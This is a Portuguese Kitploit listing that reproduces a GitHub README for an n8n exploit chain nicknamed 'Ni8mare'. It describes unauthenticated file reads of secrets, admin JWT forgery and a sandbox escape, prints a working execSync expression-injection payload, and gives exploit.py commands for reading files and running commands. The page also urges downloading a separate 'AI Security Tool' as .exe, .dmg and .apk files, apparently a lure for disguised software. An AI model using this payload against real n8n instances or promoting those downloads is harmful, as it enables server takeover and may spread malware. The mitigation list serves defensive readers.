Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-21858-n8n-FullChain — 🛡️ Módulo oficial de ferramenta de segurança de IA para CVE-2026-21858 + CVE-2025-68613 (n8n "Ni8mare" Cadeia Completa de Leitura Arbitrária de Arquivos Não Autenticada e RCE por Injeção de Expressão). | Kitploit
Ferramentas/GitHubGitHub/zerodayevil/cve-2026-21858-n8n-fullchain
Scanners de VulnerabilidadesAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebPós-ExploraçãoSegurança WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
Segurança de IA
GitHubzerodayevil/cve-2026-21858-n8n-fullchain

CVE-2026-21858-n8n-FullChain

🛡️ Módulo oficial de ferramenta de segurança de IA para CVE-2026-21858 + CVE-2025-68613 (n8n "Ni8mare" Cadeia Completa de Leitura Arbitrária de Arquivos Não Autenticada e RCE por Injeção de Expressão).

Ver Repositório
há 14h 16mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🛡️ Módulo de Ferramenta de Segurança de IA
Cadeia Completa n8n (CVE-2026-21858 + CVE-2025-68613) — "Ni8mare"

Módulo Oficial de Auditoria de Segurança para o Ecossistema de Ferramentas de Segurança de IA


Latest Release Build Status Donations Telegram Channel

License

🌐 Demonstração Web • 📚 Site do Projeto • 💬 Chat da Comunidade

Navegação do Site: Início • Atualizações • Downloads • Módulos

AI Security Tool Banner


🧠 Visão Geral Conceitual

Este módulo fornece ferramentas de diagnóstico e uma cadeia completa de exploração para instâncias de automação de fluxo de trabalho n8n, apelidada de Ni8mare.

A cadeia de ataque combina uma Leitura Arbitrária de Arquivos não autenticada (CVE-2026-21858) causada por confusão de Content-Type com um Bypass de Sandbox por Injeção de Expressão autenticada (CVE-2025-68613). Ao enviar uma requisição manipulada com Content-Type: application/json para um formulário de upload de arquivo exposto, um atacante controla o argumento filepath para ler arquivos internos do sistema (/proc/self/environ, configuração e banco de dados SQLite). A encryptionKey e o hash de senha obtidos permitem a falsificação offline de um cookie JWT de administrador. Uma vez autenticado, a injeção de expressão via this.process.mainModule.require escapa do sandbox JavaScript para executar comandos arbitrários do sistema.

🎯 Filosofia Central de Impacto

"Da leitura de arquivo à tomada completa do sistema em três etapas."
Enquanto a leitura de arquivo exige um fluxo de trabalho de formulário ativo com saída binária, a injeção de expressão funciona de forma confiável em instalações padrão do n8n, sem exigir nós especiais ou permissões explícitas de sistema habilitadas.

📊 Especificações da Vulnerabilidade

EspecificaçãoValor AtribuídoObservações
Identificadores CVECVE-2026-21858 + CVE-2025-68613Cadeia Completa: Leitura de Arquivo Não Autenticada até RCE
Classificação de SeveridadeCrítica (CVSS v3.1: 10.0 + 9.9)Cadeia de RCE não autenticada
Tipos de VulnerabilidadeCWE-200 / CWE-94Confusão de Content-Type / Injeção de Código
Componente AfetadoMotor de Automação de Fluxo de Trabalho n8nVersões <= 1.65.0 (AFR) / >= 0.211.0 (RCE)
Versões Corrigidas1.121.0 (AFR) / 1.120.4+ (RCE)Patches oficiais do fornecedor lançados
Privilégios NecessáriosNenhumAcesso inicial não autenticado via formulário público

🕸 Cenário de Ataque & Arquitetura

root@kitploit:~
graph TD
    A[Unauthenticated Attacker] -->|1. Content-Type Confusion| B[Vulnerable Form Endpoint]
    B -->|2. Arbitrary File Read| C[Extract /proc/self/environ & database.sqlite]
    C -->|3. Derive Secret & Hash| D[Forge Admin JWT Cookie]
    D -->|4. Authenticate as Admin| E[n8n Workflow Engine]
    E -->|5. Expression Injection Payload| F[Sandbox Escape via mainModule.require]
    F -->|6. Execute Command| G[Full Remote Code Execution]

💻 Payload de Injeção de Expressão

root@kitploit:~
={{ (function() {
  var require = this.process.mainModule.require;
  var execSync = require("child_process").execSync;
  return execSync("id").toString();
})() }}

🛡 Lista de Verificação de Mitigação

  • 🟢 Atualize Imediatamente: Atualize as instâncias n8n para a versão 1.121.0 ou superior.
  • 🟢 Restrinja os Gatilhos de Fluxo de Trabalho: Desative fluxos de trabalho de formulário públicos não autenticados ou imponha validação estrita de arquivos.
  • 🟡 Configure Restrições de Execução: Defina N8N_ENFORCE_SETTINGS_FILE_PERMISSIONS=true e restrinja as capacidades de processo em contêineres Docker.

💻 Como Executar este Módulo

⚠️ IMPORTANTE: Este módulo foi criado especificamente para execução segura e diagnóstico dentro do ecossistema AI Security Tool. Sempre use módulos verificados obtidos de repositórios oficiais.

1️⃣ Instalar o AI Security Tool

Para executar os scripts de monitoramento e diagnóstico, certifique-se de que o motor principal do AI Security Tool esteja instalado:

SO / PlataformaVersãoArquitetura / FormatoData de LançamentoStatusLink de Download
🪟 Windowsv6.3.20Instalador x64 (.exe)2026-09-08🟢 Mais RecenteBaixar .exe
🪟 Windowsv6.3.20Portátil x64 (.tar.gz)2026-09-08🟢 Mais RecenteBaixar .tar.gz
🍏 macOSv5.3.29Apple Silicon M1/M2/M3 (.dmg)2026-09-05🟢 EstávelBaixar .dmg
🐧 Linuxv5.3.27Universal x64 (.tar.gz)2026-09-01🟢 EstávelBaixar .tar.gz
🤖 Androidv8a 5.3.27ARM64 APK (.apk)2026-09-01🟢 EstávelBaixar .apk

2️⃣ Execução no Console

root@kitploit:~
# Read arbitrary file via diagnostic module
uv run python exploit.py http://localhost:5678 /form/vulnerable-form --read /etc/passwd

Execute full attack chain with custom command

uv run python exploit.py http://localhost:5678 /form/vulnerable-form --cmd "id"


🔍 Módulos de Auditoria de Segurança & Repositórios PoC

Módulos de scanner de vulnerabilidades, scripts PoC e repositórios de pesquisa mantidos pela nossa comunidade:

🔥 Execução Remota de Código (RCE) & Vulnerabilidades de Rede 5 módulos
  • CVE-2026-21858 — RCE Não Autenticada de Cadeia Completa n8n (Ni8mare) @ZeroDayEvil
  • CVE-2026-41089 — Exploit de Execução Remota de Código Netlogon @ZeroDayEvil
  • CVE-2026-20805 — Prova de Conceito de Execução Remota de Código no Windows @ZeroDayEvil
  • CVE-2026-41096 — Módulo Scanner de Vulnerabilidade RCE Crítica @ZeroDayEvil
  • CVE-2026-24291 — Execução Remota de Código em Protocolo de Rede @ZeroDayVPN
🛡️ Escalação de Privilégios (EoP) & Serviços 3 módulos
  • CVE-2026-54121 — Representação de Controlador de Domínio AD CS Certighost @ZeroDayEvil
  • CVE-2026-66804 — Escalação de Privilégios do Serviço CrossDevice @ZeroDayVPN
  • CVE-2026-50416 — Writeup & PoC de Escalação de Privilégios Local @ZeroDayEvil
📚 Pesquisa de Vulnerabilidades & Writeups 2 módulos
  • CVE-2026-42978 — Análise Técnica Aprofundada & Pesquisa PoC @ZeroDayEvil
  • CVE-2026-83991 — WriteUp Completo & Demonstração de Exploração @ZeroDayVPN

⚖️ Licença & Aviso Legal

🚨 Aviso

Esta ferramenta e análise técnica são fornecidas estritamente para auditoria de sistemas autorizada, pesquisa e testes de penetração.
Executar cadeias de exploração contra alvos não autorizados é ilegal. Os autores não assumem qualquer responsabilidade por acesso não autorizado, perda de dados ou interrupções de sistema. Opere estritamente dentro de um escopo autorizado.

🔄 Contribuição & Comunidade

Recebemos com satisfação contribuições da comunidade de pesquisa de segurança! Principais áreas de contribuição:

  1. Integrações de IA: Adicionar novos provedores de LLM e desenvolver agentes de segurança especializados.
  2. Ferramentas de Segurança: Desenvolver módulos de vulnerabilidade e integrar scanners CLI.
  3. Otimização: Melhorar a velocidade do parser, a segurança de execução e a lógica de cache.
  4. Documentação: Escrever artigos de pesquisa, guias e traduções localizadas.

🔗 Contato & Suporte

  • Site Oficial: ZeroDayEvil.com
  • Pesquisa Original: Cyera Ni8mare Write-up
  • Administrador do Telegram: @ZeroDayEvil
  • Chat do Telegram: @ZeroDyaTool_chat
  • Canal do Telegram: @ZeroDyaTool_channel
  • Patrocinar o Projeto: Doações via PayPal
  • Open Collective: opencollective.com/ZeroDayEvil

AI Security Tool — Reimaginando o fluxo de trabalho de terminal e automação para profissionais de cibersegurança.

Baixar ferramenta